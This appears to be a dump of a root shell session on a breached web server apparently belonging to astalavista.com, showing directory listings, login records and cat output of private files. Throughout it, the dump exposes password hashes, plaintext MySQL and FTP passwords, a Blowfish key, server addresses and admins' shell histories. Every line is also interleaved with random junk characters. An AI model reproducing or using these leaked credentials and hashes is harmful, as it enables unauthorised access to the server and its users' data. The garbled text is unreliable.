admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::4 t& x/ S9 _$ y# O" w' H- B
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::7 ?0 T/ ^% d0 T f# { |. E
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::/ ^- @1 p7 N: Q3 M, N) \" \3 A+ M
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
) S0 h" j1 u; `4 @3 [8 b; ]0 H/ U. N3 j
sh-3.2# cat /etc/motd
) {& X* ]& P/ a! m9 n" Z6 A' p9 ]1 F: J###################################################### R! v- _7 ^( n3 v0 H7 M; T
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #5 g9 N4 K: l; i8 T/ `' |7 Z1 F( B
# |__| [__ | |__| | |__| | | | [__ | |__| #9 z4 j7 L3 T0 P) w, z& ~: t
# | | ___] | | | |___ | | \/ | ___] | | | #" m3 P; |! w8 A' B, ]' m: e- ]
# #
- r( p0 F4 N" j9 q( u4 B, l/ c#####################################################0 `& ?( l. Y7 S2 e
# #
( w7 j& a! \8 o% `# Admin Contact - 链接标记support@secureservertech.com #
/ d" `3 o& ^6 n y3 ^, k" a6 F# #
- [# ?8 D4 p9 z2 S8 x' g$ f* c# Available ShortCuts #4 Q$ P) l% {" q0 \
# #! Z4 b& I: J8 i) q
# nst - list active connections #9 ]; B% I7 m) A( m$ C% k0 V! t
# ddos - shows how many times each ip is connected #
. v( v5 J2 I; o# p5 M* `# ltr - restart the webserver #3 `) Z5 Y9 L* P& E- ?* P
# phpc - edit the php config file #
" O! z8 w0 n& z Y: L/ {8 {# htc - edit the webserver configuration file #& t! }. v& y* L) x$ v3 }
# up - uptime #
" F8 O" O( T' k) c. o8 _) C6 A. K u# etd - edit the motd of the day file #
) l. {5 S% ?9 z: p5 H i1 e( `. Z# htr - start and restart apache if needed #: B7 \; ] J) Y6 ^+ g% q
# syng - shows active SYN_RECV connections #7 X; d% _" q0 ^0 Q5 ~
# synd - syn flood blocker - “synd -h” for usage #8 j7 f S+ J7 B, X: S0 s% k6 {
##################################################### W1 L P* u* `, y! G4 v+ O8 z
# NOTES: #
% T& p3 y, z! Z- F2 G# Last Upgrade - 12-08-2008 by JF #* M( P* _ k/ Z5 c/ r2 }# G4 j! x
# My.cnf/Mysql Optimization - 1-28-09 #+ Y# d- I9 \/ O% C
# #
( z- N1 H1 N" y4 T1 \% N- Y# #% ]3 d6 l5 z1 A% D- f, |
# #9 Q& g' D8 g5 i9 `1 h' d5 f
#####################################################
0 j' u: ~! Z% j9 _
/ N7 A7 H" E- F/ [# b; {+ xsh-3.2# lastlog | grep -v Never, J" e$ R- E4 o- i, s
Username Port From Latest
X1 f: t; e( ^4 aroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20095 {7 {6 g8 Q/ |6 B
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
: ?: `/ T/ s0 k' M3 ^# \# u; mcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
0 m: Y, U; p1 Z) U! ~astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
' L. z. T. \# t/ t
4 N+ R# Q4 n' F2 m& `7 r) u; m+ vsh-3.2# ls -la
+ V: { V3 u2 B6 |- ttotal 453376
8 d4 ]% t: J8 }$ v! qdrwxr-x— 15 root root 4096 Jun 4 08:40 ./ D" f% I' [; U1 r1 D
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
$ X+ r" y9 c7 z8 n1 T. J-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip2 Y/ x/ Y/ g8 L' F/ g7 k, N* W
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
9 J K) k s1 H4 H6 [5 _9 z-rw——- 1 root root 16836 Jun 4 07:21 .bash_history6 x/ { L" E" Y. B- Z; W% x( I" U
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout& w; b/ J( C" S1 A
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile G% Q6 L0 f4 w/ z9 N# _
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
! O6 \" r+ }4 O" e. h e-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
; T8 E# V1 h& Z& o/ y' E-rw-r–r– 1 root root 1327 Nov 29 2007 cert& Z; T2 S; J& m0 K8 z( x/ P7 K
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql6 U5 g; q1 c4 K2 M
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
, N6 A( l/ x6 }2 x! b-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
! j) [- O7 E/ b) t4 | { U-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
& x, V- L/ N* A9 U/ ~drwx—— 2 root root 4096 Oct 28 2007 .elinks8 h, A, v2 d/ Y* W3 ?! a/ H" f+ {9 `; {
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.12 v* G' _ q+ z: z1 b9 F
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
5 w7 e- h3 H, Q7 i2 O-rw——- 1 root root 0 Apr 16 13:19 .history
, ^+ v' e- t: H. C* Y& `-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
3 i0 M9 c, p" E+ Q-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog9 ^! |2 S( a( [7 W
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
0 h8 S5 l. f2 f6 ^+ b-rw——- 1 root root 35 Jun 2 14:23 .lesshst* f( d) |+ E7 [* r% E4 ?
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
K$ Z! w' z* I8 n5 h0 `drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
* y& G, T! P" s' x7 |-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz3 m& [3 |& ?' v, A2 B
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
9 i1 V" ^1 V: `( I. v4 l-rwx—— 1 root root 760 Sep 18 2008 lp
) S2 C: G5 O: H* S7 ]drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
6 t8 N P7 u6 t, {$ h7 i4 p-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
. Q- P9 j: O x/ J0 j-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
: r+ ~* g) I; G/ w, s$ Hdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
3 g( j$ M( d I' o-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz2 ]- y9 q2 k* o9 S$ a
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
& j) U. Q0 \; c+ Y6 X' V* m-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
, ^3 N/ }# ?/ E; d9 j) M# e-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh% ?: m( g7 U$ Q1 h4 t
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
0 Q/ I( g7 I% w; {-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history; J6 Y; U0 m( Q! x
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
! E8 [7 }! X' O5 Z-rw——- 1 root root 41 May 20 2008 .mytop
1 q; |* L; U" L$ ^; Vdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6) @2 s+ l! y1 _6 r
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
1 H; X; _7 P; q2 v! Ndrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp# b1 w5 O) f! v4 Y3 _- w' {
-rw——- 1 root root 1462 Sep 21 2007 opt.php% j- K4 R! t) s& J
-rw-r–r– 1 root root 3371 Sep 22 2007 p$ i7 M# Z# n+ m9 f0 D2 ?
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
9 D/ t2 T$ ?( X0 F8 v( `-rw——- 1 root root 1024 Feb 3 21:32 .rnd
Y9 w( |/ a, Z4 y) y-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
) {2 G# b. @# \0 c-rw-r–r– 1 root root 887 Nov 28 2007 server.key
, T/ Z5 Z g; ]' }0 \/ z& _# h2 {drwx—— 2 root root 4096 Oct 10 2008 .ssh
7 z2 ]- Z0 ~* [4 X-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
5 i8 ^. ]6 i z8 a4 T6 d5 |. Y-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
# L9 L! h6 O, [) e# N-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip7 @+ r5 d/ M v& P) u
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1: X8 A1 w# W1 q, d
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp$ f' O9 {$ X& S, U9 n9 j
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh: B& d# Z: J! q4 `( b! N% N
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
* h/ P6 m$ O# ?" d% g! @-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2( Y5 f0 n! i4 u, v
-rw——- 1 root root 12997 May 16 2008 .viminfo& ]3 g$ D. f+ H7 l7 ^0 Z2 e
i% o, O9 _- m1 P+ X Csh-3.2# cat .bash_history+ ^" u$ U3 Q2 R5 L& I
[snip] u# T/ v1 a* ~: @/ o
wget cp4sst.com/sstlinux.tar.gz7 L3 q- q$ ?* z; }. v5 I2 p
tar zxvf sstlinux.tar.gz& c9 `- y# E& |0 v" X" ^, Z% G
cd linux-2.6.27.108 n/ L0 R3 l4 t; a! O F( w( A
sh install.sh1 J9 b ~9 L; W8 C2 @& S( x
make bzImage ; make modules ; make modules_install ; make install! \6 z# m' A; Y6 U& k
make clean$ ?9 |$ @* N3 r8 x
service mysqld restart u$ f, ~$ X: ]$ L/ i, w
[snip]$ t; @/ z5 Q* u) w* Q/ }( ]6 L
cd /usr/sbin/: ?! f9 L" E2 M/ Z3 j* Y
chmod 4777 traceroute& x6 x4 o0 F! S% p0 }
chmod 4777 ping+ _: |1 m# @: ^' l/ _( W8 f; @2 x" [
traceroute -I 链接标记[url]www.astalavista.ch[/url]
6 f# {' Y: v9 t+ D }- Z[snip]5 G8 g3 Y- ]/ ~( e
vi /etc/csf/csf.conf! |9 M! G4 K+ n5 R9 ^' V5 a
traceroute google.ch
9 g. I. U- I8 lservice csf restart
. ~% e$ Q1 O! `" S E' d! Dtracert google.ch
1 E2 J9 W- G+ E0 Zservice csf restart# K2 n. W8 Q, ` E
traceroute 链接标记[url]www.google.ch[/url]8 Q1 G. \6 `1 y2 |8 D9 p
tracert 链接标记[url]www.google.ch[/url]
. F: b5 n) \8 o' d6 ~+ otraceroute 链接标记[url]www.google.ch[/url]! E' L x1 V2 Z" E0 e$ B& w, ]
locate traceroute
9 b* A6 y+ p. A1 z# i% j0 ~0 ?chown 4755 /bin/traceroute
) j2 V0 D9 |" a$ T$ p- [8 @( Jchown 4777 /bin/traceroute- E) O: B. R; a! L6 ?
locate ping, m$ h# o9 t' T9 n
chown 4755 /bin/ping0 ^' ^$ S; e% f4 G8 H& n7 S" p
chown 4777 /bin/ping' o z: r, |4 k* Q6 m. F: l
cd /bin/* _2 S; q' k5 N& J0 G
ls -ali | grep ping
8 J' U: Y7 ~5 j1 q+ i3 vchown root ping1 H' V* `& F; g# O2 z- n
chmod 4755 ping& @1 V/ j' _" Q- t1 Z u
ls -ali | grep traceroute
7 Y! Y7 K1 \" ^chown root traceroute( w: d! t/ j3 T: f& q2 O4 p# t( a
chmod 4755 traceroute- A# h: H- `) z. M8 s5 z% r
ls -ali | grep traceroute. ?% Y- E- J0 g9 z S9 U
traceroute -I 链接标记[url]www.google.ch[/url]/ X; s/ X& _- z, B8 T! a1 q+ N
traceroute 链接标记[url]www.google.ch[/url]( r& k- j' O% b7 k( r; g
whois pmsantos.ch
6 w5 {8 P( Y9 M: y[snip]
2 ^+ p/ Y+ p. Q/ h" |$ ^$ Qmysql -h com_contrexx2_live < /root/defaultp_ports.sql
4 E3 ~! u: }, ]( Umysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql$ R- l3 B1 i# G$ u( W
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql/ y& X( w' t( O/ C3 @& B
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql* `0 F5 H8 E9 i/ W4 _
top
; z4 h" h: y* o8 ?+ J1 Cping ssth.ch: g. X% \- ?3 ~, Z% y& h9 ?$ P
ping asdlkfaljgasd???ljg???lasj.ch$ E+ P: O& v7 J2 T! I3 [0 @
ping asdlkfaljgasdlasj.ch7 f/ e2 f6 o: `" e9 d: @
ping 链接标记[url]www.ssth.ch[/url]
: u1 i2 I; z7 xping ssth.ch
. Y2 } R2 a& x8 q0 _nslookup 链接标记[url]www.google.ch[/url]
+ z3 V) u& [) y' unslookup 链接标记[url]www.ssth.ch[/url]
- ]" t; u# ]! x. ?) A9 L/ J$ aman nslookup
& X4 O _/ I4 W( |4 O) Gping 链接标记[url]www.google.ch[/url]
9 s6 X P" R: d% Z& Dnslookup 链接标记[url]www.google.ch[/url]) W6 D% ?# u$ {
nslookup 链接标记[url]www.google.ch[/url]
* y; z0 C, x" c5 z4 R+ bnslookup salfjasdlf.ch
' a. o8 G2 p3 I2 R[snip]
; ~ D8 j* A- g- r& y) d9 t* Copenssl passwd -1 sadf) ~# L6 w. |" E) W& \. l: I3 B
openssl passwd -1 5cZNHstdTy
$ x7 a; ?" B A: S/ smysql
$ [) @1 Q, h C/ \- j! M( K1 Smysql" z' ~) m4 M6 m4 t; y- v
locate proftp B" |8 ?( p1 l+ b; d4 H N
vi /etc/proftpd.passwd
! ~" j6 Q% x! yservice proftpd restart. p! y- I% D% I8 F5 `4 N* k$ O
locate proftpd.conf; j) G' X1 }2 Y. x* j! Y
vi /etc/proftpd.conf
" ^) a. x) e- b/ c+ o3 wvi /etc/proftpd.passwd# R: D& s( T5 \: ^. N& g8 k: ?
service proftpd restart
6 {9 @0 V, j4 D+ F4 J( g: c- W. p' k! {[snip]
5 [5 V& O0 t( q4 Z0 h8 y* n/bin/sh /home/com/backup_system/backup.sh
- b- H1 F0 I5 s) [tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin1 d a. d1 I- B% x% h
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
4 h3 B: B' f8 u, B, cmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
! \. ]' a3 N' _; h+ W ]8 S6 @7 vls -ali
' Q. f1 u1 }8 Kmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
! e4 Z3 b% A8 I; tmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
! H: \& p5 X& L& \crontab -l
@9 d5 e3 t; L& N: D1 icrontab -l
3 t2 i5 h U V/ X4 Gphp -q /home/com/public_html/modifications/cronjobs/securitynews.php9 {9 O9 ] f4 l7 q" |4 }
/home/com/public_html/modifications/cronjobs/exploits.sh
; j7 Q. z" i& P5 r% Zwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]; J' c5 z8 m- V( j. z& A2 U; D
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz* B5 i7 L4 D. d8 C# M1 {
cd lsws-4.0.3
0 q$ ~9 {# x$ g0 u( tsh install.sh
1 D. A" Q0 m, A/ z; I5 q' Z* ]uptime
" i* b2 i* M2 C: s ~+ ~+ thdparm -tt /dev/sda$ q$ o- W9 O' Z* q0 v% V- S
iostat: ?0 a2 H1 X1 Q+ N2 W
yum install iostat
* b' I+ i U1 d. Q2 d: jiostat
' w4 P& H0 t* y4 W, y7 ewhereis iostat: D0 Q4 e/ B. Z5 {+ `! J
yjm clean all
: ^4 A# w7 _# d9 b/ O# o0 yyum clean all ; yum -y update
1 m( f$ U. E7 M# ]iostat
, Y9 A( ?9 a0 l: T% `' \1 Nyum install systat
* y/ m1 E* `8 j9 X, `8 j/ Jrpm -qa | grep iostat
+ R: {1 j2 R* k& wrpm -qa | grep sysstat
6 K2 j% ?+ k$ o) @rpm -qa | grep systat0 a1 L! ~9 z3 l" A' K" z" h' a0 A
dmesg -c, r {& F) u2 [0 e5 p! u2 j
sysctl -p
5 C2 K3 z9 H% R7 Y( H: kuname -r
/ l0 ~- ~" f5 m" y5 L% W6 xcd /usr/src) r3 u% v- t4 a! |0 p6 |, |
wget nix101.com/kernels/sstlinux.tar.gz
9 X( Y5 F% b b5 \, X& o2 _' X- Xshutdown -r now
' @) s% h' z4 b7 znano -w /boot/grub/grub.conf6 ~/ ]3 v& ]) ]4 N6 T' E
. `' r. u" y5 k8 ^
sh-3.2# cat .my.cnf
7 E% ^0 d8 C% I[client]$ A7 s: D; \8 Z9 Z o
user=da_admin. _0 c. n& c9 Y4 M0 E4 e0 F
password=X9dctmRH+ r# ~6 Y6 y" e
* p) K% H% r3 Q) C' m3 t7 gsh-3.2# cat /home/com/backup_system/backup.sh
9 S0 D6 L9 X$ d) p#!/bin/sh$ l- A- Y; O' R% Z( d6 g% R
#####################################################################
; n8 G* S/ t* L v4 H0 z# #: h5 K9 D: y/ V& [0 I0 [
# incremental backup for astalavista.com #
9 m6 t7 `9 o. C& c# #
* _2 q9 |1 x$ v2 h% g4 Z5 N) S# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #3 N% k, f/ [% p' s6 a
# #
0 [, w3 X' q% g0 O5 S' C#####################################################################
2 ~7 k5 F+ ?; R5 ?: k[snip]$ o% d( P8 t9 v3 H
PROG_DIR=”/home/com/backup_system”;
1 l1 N0 d2 s( E3 IBACKUP_DIR=”/home/com/backups”;
3 ?" w5 T1 X% I- X6 M7 iDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
* u' [! [9 C" g4 c# ftp for synology backup server" f" d3 M( j$ _. W3 ~6 e6 @
FTP_HOST=”212.254.194.163″;; z; K2 i8 a2 ~7 U
FTP_PORT=”21″;
; F$ F" s2 J3 S- E9 q6 M4 d6 NFTP_USER=”astalavista.com”;+ x; \: N, T7 k
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;2 x1 m s" h/ T% Q) _% m9 i
FTP_DIR=”/astalavista.com”;
) X% P7 T$ ?8 e1 j& n7 B# database L! f8 s7 I _; a
DB_HOST=”localhost”;
. d R. }# s0 U D! a/ D/ EDB_USER=”contrexxuser2″;0 s" `( g) h6 z2 M! ^+ C
DB_PASS=”0fEYNZgXz1pKe”;
; f d" _" w9 ^( J' `+ ^, DDB_DATABASE1=”com_contrexx2_live”;9 R3 I3 C( r2 |
DB_DATABASE2=”com_contrexx2″;
* V( E& {, P! C8 Z1 V[snip]* c4 }) o, ?- H& q1 Q# l1 ~' A
ftp -in $FTP_HOST $FTP_PORT <<EOF
' B- _, H# x; C* jquote USER $FTP_USER2 C/ x! @1 C- T- _1 v8 _$ u
quote PASS $FTP_PASS
K, ^% _, N E; s, C3 hcd $FTP_DIR: L# X* L, K/ s% ~$ B
put $DB_FULLNAME-SQL_Dump.tar
& h; Z% a+ p" n7 x+ d9 j5 ~& r( Kput $BACKUP_FULLNAME-Public_HTML.tar
" |* O& z6 C, t& n6 S* w3 G# [% v, yclose
V% Q# L R$ n4 } u" o6 z! ebye1 y1 T5 U1 n& U7 J! Y. O2 w! s' v
EOF
6 o- b# I/ Z8 F9 \$ D% O
+ E O: `: F3 h; J: s& Jsh-3.2# cd /home
. g: u8 B5 I/ m" Esh-3.2# ls -la4 J" Y5 g8 P4 B/ F
total 120
2 G; K) [+ M5 N1 B/ i; _ tdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .2 G# Q- ^' J# {# h7 @
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( T0 c# p4 R, @9 H9 s5 O2 {drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
1 f h: j# |3 U% V5 V-rw——- 1 root root 8192 Jun 4 03:03 aquota.group0 _2 q7 {: ?% v: G% Q! ^
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user3 z7 C) P' R6 J$ Y, X* b( \
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet% F, d- v# m" y; U& _5 J
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup# Q2 q I3 l: k! w' W3 A4 K( {
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141615 s. ~% s! l- j d
drwx–x–x 10 com com 4096 Apr 28 12:40 com
, T( i Q2 n0 D; ~% ]* T" `7 p; Udrwxr-xr-x 2 root root 4096 May 17 2007 ftp8 c+ S& @* q7 A1 C, Q
drwx—— 3 jon jon 4096 Sep 21 2007 jon
# Z1 N( \, P( L z: ?" N6 M! T* c- Wdrwx—— 2 root root 16384 Sep 11 2007 lost+found2 k7 _: T. K9 i
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
1 z2 e: I3 ^! `0 T5 {; o( Zdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
8 h9 Y" X. Z$ t1 q, ?$ @, g6 ndrwx—— 2 jon jon 4096 Sep 15 2007 test1 g$ L1 V% S( | w! Q' |
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp& Y! |. `* r2 B8 c" ?- r# S
/ Y( j6 B3 B0 H- H- _* dsh-3.2# cd admin$ P" x4 ]! U/ W; W( p( r
sh-3.2# ls -la
0 P2 a* M8 [( N3 p/ O$ T: i; z- Qtotal 1735896) s4 Z6 P8 c3 S8 N8 O
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
' E9 ^7 c. O! n8 k0 d3 d( idrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
9 q& M/ x' H" U; I* F/ Y: Ndrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups' ^) [& @, @3 I- J- ~# P
drwx—— 2 admin admin 4096 Sep 28 2007 backups
& n, k C+ b" ]8 Q! u7 @-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
% J0 g/ t6 G5 W5 N4 X! n-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
1 W4 D, e" q' {7 [3 m0 l' G-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile2 f- _# |+ w2 M3 L' L o h
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc7 ? F+ J' C( `2 {7 d4 e
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups% d& S4 G2 p3 M, a% N! w0 t9 d
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains9 I; a" W, d1 N8 p# {
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
' K& ?$ \4 ]6 U$ O t-rw-r–r– 1 root root 24 Sep 21 2007 info.php# U8 u. a# n" Q
drwx—— 2 admin admin 4096 Sep 21 2007 mail
" K( K1 C8 [3 Q- F8 J-rw-r–r– 1 root root 716 Nov 28 2007 server.csr& r9 G5 v4 i' l" T7 ?" p
-rw-r–r– 1 root root 887 Nov 28 2007 server.key9 n$ B! m$ ^+ l' I* a* U
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
' I( C+ W+ C6 j-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz" k% K! V+ J. r- J, s9 M, |
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups% ~, r) v# x. q. v5 H7 ^
! T! C7 j$ a9 Nsh-3.2# ..% D2 ?6 q3 G, z0 g5 E7 @/ F @
sh-3.2# cd jon
: f ?6 s% |) |( S7 m! S! E- zsh-3.2# ls -la& I* h* a& Y2 U% ?
total 360 w8 {. G0 g/ e/ l: ^, i+ N
drwx—— 3 jon jon 4096 Sep 21 2007 .9 @# @/ _6 u. R" Q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 m/ i+ A* \1 n. z! D5 u# p-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
) [& b9 Z: F$ W-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
, b/ Z T+ E( m8 y Z( T7 g/ {-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile- Q6 T5 D5 x2 y$ s. Y* k" Y$ u5 h, q, Q
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc; c0 b. u- ^* G' C3 @3 O
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
- c# y$ I* T# H; D' Fdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
/ E- @8 F) p& K, r0 q( K# U8 d
3 D; E# v. v6 \* |3 Fsh-3.2# cd ..# m# J+ }& C3 m7 S0 t4 h/ A
sh-3.2# cd test
% p N1 x8 D, csh-3.2# ls -la
) o3 J# }$ n& D3 m# P' etotal 48
. x `8 j) w/ P- d2 rdrwx—— 2 jon jon 4096 Sep 15 2007 ./ x/ w( ~! L' c7 C) J! o0 B
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) d* H ^# z; e" Z- |. A/ ^. o. B
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
8 g, n6 L; k, T-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout1 h0 L* I% O- y9 r' N: @) }
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile( X+ c% U5 a. x
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc" L0 g9 }, c) {! I. Y
sh-3.2# cat .bash_history; F0 o0 W: g, h" ?: z# \- I
/usr/bin/mysqladmin -u root password PoliuJhytg67
# [. a% o$ W, Q' j* F( s9 N2 ~: m" w* E' Q1 L, Z6 n
sh-3.2# cd ..
0 T+ H( s6 l5 j3 }" y# |, f" csh-3.2# cd astanet; ]0 m+ z+ r) c2 [; x( t
sh-3.2# ls -la9 D6 `" V) J ?
total 52
( k; z2 h7 X) S9 e0 O& \9 I1 Gdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
' G7 L% t" E( r/ e2 \; f% E5 |4 W6 Mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: B* g2 J, O9 y! X1 Odrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
& ^! e; N- z3 W; O7 f: J7 p-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
! Y3 ^* {5 p6 w* t# {; s- n2 A8 M-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
; G/ Q! T# p# f5 `-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile' x' [% x* [: s# p
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc1 F* w, _( T: t+ n$ t/ K; K
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains& e2 y1 t$ X V) D/ d
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. R4 Q( ?. R& L" ]2 {
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail4 ?4 { q Z3 f# c% p# M- o: y5 d5 P
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
! i$ {5 \# q" R7 t) ~- t1 nlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
4 Z, n# ]0 `3 b' }( s-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
7 ~, q5 C* T0 h1 P* l
. w* T! N- D, c# i. V' }& c! @+ rsh-3.2# cd auth/
5 k# x2 ^' W, q1 ^8 i; Bsh-3.2# ls -la7 x- f; _5 h8 h0 n5 F
total 28" y. e$ d. i; @$ a) f' _
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
. K; j4 _( f1 q; G! R7 c0 E1 {drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
. V' P1 s. U' x' V) x3 R-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php9 C% Y! y0 {: t. e: g) @3 U; t
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
3 [" f5 ^/ `, A: a- v) o. O-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd, M2 y( N4 D7 f- k# ~3 B& c, x
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
% p J8 H# \8 u-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
+ Q7 p1 \7 U% s* F2 J, V1 y( u" z
sh-3.2# cat hackercontest.config.inc.php& h- j0 i) j/ g3 j h1 P* I
<?PHP9 z- _3 M: U ?6 L* J6 ]
// Variabeln f?r Verbindung zur Datenbank //
1 ` v. o n) _1 W2 l+ D$conxHost = ‘localhost’; // MySQL hostname! {' r7 @! |# k; H
$conxUser = ‘hackercontest’; // MySQL user
9 C4 H$ ]' C& V8 Z3 g; r$conxPassword = ‘K6m@7dUc’; // MySQL password
; h f4 Y$ m0 p/ D9 m$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish$ U, d( o" @; b: i' k4 Y
?>
' V; Z" ?' v( _& Y: x( A( Wsh-3.2# cat hosting.config.inc.php! k5 Q. u" A) K
